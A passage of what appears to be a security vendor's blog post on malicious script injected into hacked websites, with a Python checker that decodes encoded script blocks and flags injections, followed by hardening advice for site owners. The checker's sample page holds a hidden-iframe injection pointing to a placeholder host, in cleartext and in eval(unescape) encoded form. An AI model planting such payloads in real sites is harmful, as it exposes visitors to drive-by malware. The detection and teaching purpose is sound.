The injected code
It is either written in cleartext or encoded and therefore obfuscated.
Our scanners detect this injection as HTML:Script-inf, so G Data users with active HTTP filtering are alerted right away when they visit one of the infected sites.
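As an added illustration (not code from the original post and not G Data's scanner), here is a small Python check a site owner could run over a saved copy of a page: it pulls out every script block, undoes the common eval(unescape("%xx...")) and String.fromCharCode(...) encodings, and flags blocks whose readable form writes a hidden iframe or redirects the visitor. The sample page, the malware-host.invalid address and the marker lists are constructed for this example.

```python
import re
from urllib.parse import quote, unquote

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
# Wrappers that typically hide an encoded payload from a plain-text scan.
OBFUSCATION_MARKERS = ("eval(", "unescape(", "String.fromCharCode", "atob(")
# What the payload usually does once it is readable.
INJECTION_MARKERS = ("<iframe", "document.write", "location.href", ".src=")

# Constructed sample page: one legitimate script, the same injected payload
# once in cleartext and once percent-encoded behind eval(unescape(...)).
HIDDEN_IFRAME = (
    'document.write(\'<iframe src="http://malware-host.invalid/" '
    'width="0" height="0"></iframe>\');'
)
SAMPLE_HTML = (
    "<html><head>\n"
    '<script>var siteId = "SITE-PLACEHOLDER"; trackPageView(siteId);</script>\n'
    "</head><body><p>Welcome</p>\n"
    "<script>" + HIDDEN_IFRAME + "</script>\n"
    '<script>eval(unescape("' + quote(HIDDEN_IFRAME, safe="") + '"));</script>\n'
    "</body></html>\n"
)


def decode_payload(body: str) -> str:
    """Undo the two encodings this check understands; otherwise return as-is."""
    m = re.search(r"String\.fromCharCode\(([\d,\s]+)\)", body)
    if m:
        return "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())
    if "%" in body:
        return unquote(body)
    return body


def classify_scripts(html: str) -> list:
    """Return one finding per suspicious script block: kind + decoded text."""
    findings = []
    for body in SCRIPT_RE.findall(html):
        encoded = any(mark in body for mark in OBFUSCATION_MARKERS)
        readable = decode_payload(body) if encoded else body
        if any(mark in readable for mark in INJECTION_MARKERS):
            findings.append({"kind": "encoded" if encoded else "cleartext",
                             "decoded": readable.strip()})
    return findings


if __name__ == "__main__":
    for f in classify_scripts(SAMPLE_HTML):
        print(f["kind"], "->", f["decoded"][:80])
```

A real scanner matches far more patterns; the point here is that the encoded block only becomes recognisable after it is decoded, which is why a cleartext grep alone misses it.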
What can happen?
As long as the attackers can log in, they can upload anything to the hacked web server. There are many ways they can misuse it: for example, they can inject redirecting scripts, or upload malware and use the server as a malware host.
How were the attackers able to inject the code in the first place?
There are many ways attackers can gain access to website management systems. Recently, there have been many reports of exploited vulnerabilities in content management systems that led to code injections and dangerous situations. Remember the ticking time bomb on hacked WordPress pages?
Many of the infected pages we have seen use popular free CMS solutions like WordPress or Joomla, but many don’t. We therefore suspect that the root cause lies elsewhere.
From what we know so far, it seems most likely that the computers of users managing the websites were infected with password-stealing malware, and that this malware provided the attackers with the data (especially FTP passwords) they needed to get into the websites.
The importance of securing one’s computer has been illustrated many times, especially because a single infected computer can, in turn, harm thousands of others: attackers gained access to website management systems and injected code into websites that harms the visiting users.
What can website managers do?
- To secure your site, keep your website management system up to date at all times. Install the latest software from the developer’s website.
- The same applies to all plug-ins and themes used on your websites.
- If you own the web server, ensure that it is up to date and in a secured state. If you rent web space on a remote server, contact your provider to inform yourself about the issue.
- Make sure that the passwords for all accounts (CMS, FTP, etc.) are chosen wisely. An administration account should not be named “admin”, and every account needs its own unique, sufficiently strong password. Read more about secure passwords.
- Disable or delete inactive accounts in your website management systems.
- Scan and monitor all computers that have access to your website management systems with comprehensive security solutions, to avoid infection with (password-stealing) malware.